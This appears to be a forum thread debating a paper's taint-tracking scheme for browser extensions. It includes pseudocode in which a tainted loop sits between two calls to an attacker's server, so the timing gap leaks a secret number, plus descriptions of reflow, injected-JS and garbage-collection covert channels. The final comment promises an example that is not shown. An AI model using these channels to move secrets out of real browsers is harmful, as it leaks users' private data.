Even without shared workers timing attack works - untainted worker can connect to attacker site every second and update value, and be killed by untainted code after the tainted worker finished.
EDIT: or you can do this with no multithreading at all, just getMiliseconds() before and after tainted code, and make the tainted part last secret_number miliseconds.
Or if you blacklist getMiliseconds as tainting - do this on server instead.
callAttackersServer();
{
var tainted_int = getFromOtherServer();
for (var i=0; i<tainted_int; i++) {
sleep(100 ms);
}
}
callAttackersServer();
and the difference in time between calls will be interpreted on the server as the secret number.
You do that, and basically you end up treating everything as tainted.
Also: yes, you are missing something. Namely that you don't need concurrency for this sort of timing attack. Even something as simple as "X does work or doesn't" and "Y measures execution time" leaks timing info.
For another example: X either reflows the page, or doesn't. Y keeps track of the refresh rate of the page. Or does a timing attack to determine if the page was reflowed or not. Or injects JS into the page to ping website Z when a reflow happens. (Note that it can inject this JS before it grabs the sensitive data.)
For another example: Depending on sensitive data, I either allocate a large array or don't. And then detect how much is allocated before a GC happens.
Note that this can be part JS / part "trusted" extension. It can also even take advantage of parts of existing pages.
The more I consider this scheme, the more I think it's an elegant scheme against accidental leaks, but is fundamentally flawed against malicious leaks. Unfortunately, since the entire point of it is to protect against malicious leaks...
I'm not sure I follow your examples - you seem to ignore that anything happening inside a conditional that depends on a tainted variable becomes tainted itself.
So if you read my cookies and then access the DOM (to trigger a reflow or inject JS), then all future accesses to the DOM will be considered tainted.
This doesn't taint "everything", but it should taint exactly what we want to be tainted (all possible paths to our sensitive data).
Yes, the challenge would be to find and treat all covert channels (time, GC, PRNG etc.), but that seems surmountable. The very exotic channels (like your GC example) are best handled by trimming down the general API for trusted extensions.
I.e. most extensions don't need any kind of GC access to begin with. If your extension does then all bets for fine grained taint-checks are off and it must be marked as "fully trusted" by the user before proceeding.
"Unfortunately, since the entire point of it is to protect against malicious leaks..."
That's actually not the entire point. At least in this paper, we do
not claim to address attacks that leverage covert channels. But the
attacker model assumption is weaker (i.e., the attacker is assumed to
be more powerful) than that originally assumed by the Chrome design
(e.g., that only pages are malicious and will try to exploit
extensions). And this is important. Particularly because the design
that we end up with will be more secure than the current one. So, at
worst, the new system addresses the limitations of the existing system
under their attacker model. Then, depending on how far you are willing
to hack up the browser, underlying OS, or hardware you can also try to
address the covert channel leaks.
Timing attack against yourself.
Something along the lines of the following, for instance:
(Note that it doesn't need to explicitly call sleep. It can do pretty much anything that takes an ~constant amount of time.)(Note that you can also leak LEN at the start, as to avoid tainting the loop.)